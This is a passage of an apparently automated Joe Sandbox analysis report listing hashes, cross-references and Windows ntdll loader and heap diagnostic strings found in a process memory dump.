                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                            • API String ID: 0-258546922
                            • Opcode ID: ae9f970cde10ce57a8a2b14bd152d40fde5e690fc78ca07f3463954484b9a5e8
                            • Instruction ID: 8a82767043cf5680ca8a63b6588ae6e1228b3e1467fa971d0cc06a2e4523f25c
                            • Opcode Fuzzy Hash: ae9f970cde10ce57a8a2b14bd152d40fde5e690fc78ca07f3463954484b9a5e8
                            • Instruction Fuzzy Hash: A4F13A72D11219EFCB15DFA8C980E9EBBB9EF58750F1540BAE505E7221E7709E01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1975516107
                            • Opcode ID: 30fb28d63e65f098173a8b3c1cab37bf6db4219287b27a8361ec506de5e9d28b
                            • Instruction ID: fdbb06cc3be7767e0eca9bfdcf9b3fb7f971c20a32525d60aa84eaf66ed01fcf
                            • Opcode Fuzzy Hash: 30fb28d63e65f098173a8b3c1cab37bf6db4219287b27a8361ec506de5e9d28b
                            • Instruction Fuzzy Hash: BE51C071E043859FDB14EFA4C59878EBBB1FF68314F1442BEE9006B2A1D774A981CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                            • API String ID: 0-3061284088
                            • Opcode ID: d6050bf55f9e81b5595139360e3e2d18352d041b059ada53e48c03a531a336fa
                            • Instruction ID: 75098f90d07b693b344516d0dead769ef5e8259bcebef83384e455e2863579e5
                            • Opcode Fuzzy Hash: d6050bf55f9e81b5595139360e3e2d18352d041b059ada53e48c03a531a336fa
                            • Instruction Fuzzy Hash: D8014C32018A90DFD326EF35D449F52BFD4DF56670F1841FAE01487962CEA89C80C164
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                            • API String ID: 0-3178619729
                            • Opcode ID: dc323e3cb793d40efd014daba78c826cdb17269e143963c05ba81f54830634ff
                            • Instruction ID: 7a586576236b9380adbbc21a05da5d520f24c9a937c9a80e32e7ae05ea0a7fd1
                            • Opcode Fuzzy Hash: dc323e3cb793d40efd014daba78c826cdb17269e143963c05ba81f54830634ff
                            • Instruction Fuzzy Hash: 1413CF70E00695CFDB14CF68C4A0BA9BBF1FF48300F1881A9DA59EB791D735A941DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-3570731704
                            • Opcode ID: 35ebf279a76614056c743d9d73e86c2a3a3b8814add4d088866f46917606b8f3
                            • Instruction ID: ca49702bc28537ed09081f2efbc6360ac9b5b9acf0a74d36567dc37b9bfb0062
                            • Opcode Fuzzy Hash: 35ebf279a76614056c743d9d73e86c2a3a3b8814add4d088866f46917606b8f3
                            • Instruction Fuzzy Hash: 9E923671E00268CFEB20DF28C890B99B7B5EF49314F0581FAEA49A7291D7349E81CF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                            • API String ID: 0-379654539
                            • Opcode ID: e61b15af25df11af2d3a412fd09eed4c956a438c8b0e48c9dd6408fc76def79f
                            • Instruction ID: 336cda3da25e4be883e2a9dc7d6d40428ac21ef6e83e3e2ad73147ffa451eb39
                            • Opcode Fuzzy Hash: e61b15af25df11af2d3a412fd09eed4c956a438c8b0e48c9dd6408fc76def79f
                            • Instruction Fuzzy Hash: 74C186749083968FD711DF28C040B5AB7F4FF8A704F1489BAF9958B2A0E735CA49CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 23BA22B6
                            • .Local, xrefs: 23B628D8
                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 23BA21D9, 23BA22B1
                            • SXS: %s() passed the empty activation context, xrefs: 23BA21DE
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                            • API String ID: 0-1239276146
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                            • API String ID: 0-2586055223
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                            • API String ID: 0-336120773
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                            • API String ID: 0-1391187441
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-4253913091
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                            • API String ID: 0-1145731471
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                            • API String ID: 0-2391371766
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: FilterFullPath$UseFilter$\??\
                            • API String ID: 0-2779062949
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                            • API String ID: 0-318774311
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: %$&$@
                            • API String ID: 0-1537733988
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • TargetNtPath, xrefs: 23C0B82F
                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 23C0B82A
                            • GlobalizationUserSettings, xrefs: 23C0B834
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                            • API String ID: 0-505981995
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • HEAP[%wZ]: , xrefs: 23B8E6A6
                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 23B8E6C6
                            • HEAP: , xrefs: 23B8E6B3
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                            • API String ID: 0-1340214556
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • Failed to reallocate the system dirs string !, xrefs: 23BA82D7
                            • minkernel\ntdll\ldrinit.c, xrefs: 23BA82E8
                            • LdrpInitializePerUserWindowsDirectory, xrefs: 23BA82DE
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1783798831
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 23BA1B39
                            • minkernel\ntdll\ldrtls.c, xrefs: 23BA1B4A
                            • LdrpAllocateTls, xrefs: 23BA1B40
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                            • API String ID: 0-4274184382
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 23BEC1C5
                            • PreferredUILanguages, xrefs: 23BEC212
                            • @, xrefs: 23BEC1F1
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                            • API String ID: 0-2968386058
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                            • API String ID: 0-1373925480
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • minkernel\ntdll\ldrredirect.c, xrefs: 23BB4899
                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 23BB4888
                            • LdrpCheckRedirection, xrefs: 23BB488F
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-3154609507
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • Actx , xrefs: 23B633AC
                            • RtlCreateActivationContext, xrefs: 23BA29F9
                            • SXS: %s() passed the empty activation context data, xrefs: 23BA29FE
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                            • API String ID: 0-859632880
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • LdrpInitializeTls, xrefs: 23BA1A47
                            • DLL "%wZ" has TLS information at %p, xrefs: 23BA1A40
                            • minkernel\ntdll\ldrtls.c, xrefs: 23BA1A51
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                            • API String ID: 0-931879808
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • @, xrefs: 23B712A5
                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 23B7127B
                            • BuildLabEx, xrefs: 23B7130F
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 0-3051831665
                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                            • Instruction ID: d1e895234531cdc048101f71def4cc0545c010bb372cd6d27e6541127164d4f6
                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                            • Instruction Fuzzy Hash: C9317072900618BBDB21DF95CD44E9EBBB9EB98650F0140B5EA24A7260E730DA05DB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • LdrpInitializationFailure, xrefs: 23BB20FA
                            • Process initialization failed with status 0x%08lx, xrefs: 23BB20F3
                            • minkernel\ntdll\ldrinit.c, xrefs: 23BB2104
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2986994758
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: #%u
                            • API String ID: 48624451-232158463
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @$@
                            • API String ID: 0-149943524
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: `$`
                            • API String ID: 0-197956300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: $$$
                            • API String ID: 0-233714265
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • RtlpResUltimateFallbackInfo Enter, xrefs: 23B3A2FB
                            • RtlpResUltimateFallbackInfo Exit, xrefs: 23B3A309
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                            • API String ID: 0-2876891731
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: .Local\$@
                            • API String ID: 0-380025441
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: MUI
                            • API String ID: 0-1339004836
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: {'2y
